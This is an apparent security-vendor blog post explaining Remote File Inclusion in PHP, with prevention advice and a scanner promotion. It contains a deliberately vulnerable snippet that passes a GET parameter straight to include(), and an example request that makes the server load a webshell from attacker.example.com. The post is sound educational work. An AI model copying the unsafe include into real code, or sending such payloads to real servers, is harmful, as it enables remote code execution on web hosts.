What is Remote File Inclusion (RFI)?

Using Remote File Inclusion (RFI), an attacker can cause the web application to include a remote file. This is possible for web applications that dynamically include external files or scripts. Potential consequences of a successful RFI attack range from sensitive information disclosure and Cross-site Scripting (XSS) to Remote Code Execution.

Remote File Inclusion attacks usually occur when an application receives a path to a file as input and does not properly sanitize it. This allows an external URL to be supplied to the include function.

The following is an example of PHP code with a Remote File Inclusion vulnerability.

/**
* Get the filename from a GET input
* Example - http://example.com/?file=index.php
*/
$file = $_GET['file'];

/**
* Unsafely include the file
* Example - index.php
*/
include($file);

Using the above PHP script, an attacker could make the following HTTP request to trick the application into executing server-side malicious code, for example, a webshell.

http://example.com/?file=http://attacker.example.com/evil.php

In this example, the malicious file is included and run with the privileges of the user who runs the web application. That allows an attacker to run any code they want on the web server. They can even gain a persistent presence on the web server.

Finding and Preventing RFI Vulnerabilities

Fortunately, it’s easy to test if your website or web application is vulnerable to RFI and other vulnerabilities by running an automated web scan using the Acunetix vulnerability scanner. Take a demo and find out more about running scans against your website or web application.

If you find RFI vulnerabilities, the best way to eliminate them is to completely avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included. Input validation is a much less effective method in this case because attackers can go around it using clever tricks.

Additionally, in the case of PHP, most current installations are configured with allow_url_include set to off. This makes it impossible for malicious users to include remote files. However, Local File Inclusion (LFI) is still possible in such a case.

Share this post
Ian Muscat

Acunetix developers and tech agents regularly contribute to the blog. All the Acunetix developers come with years of experience in the web security sphere.

Leave a Reply

Your email address will not be published.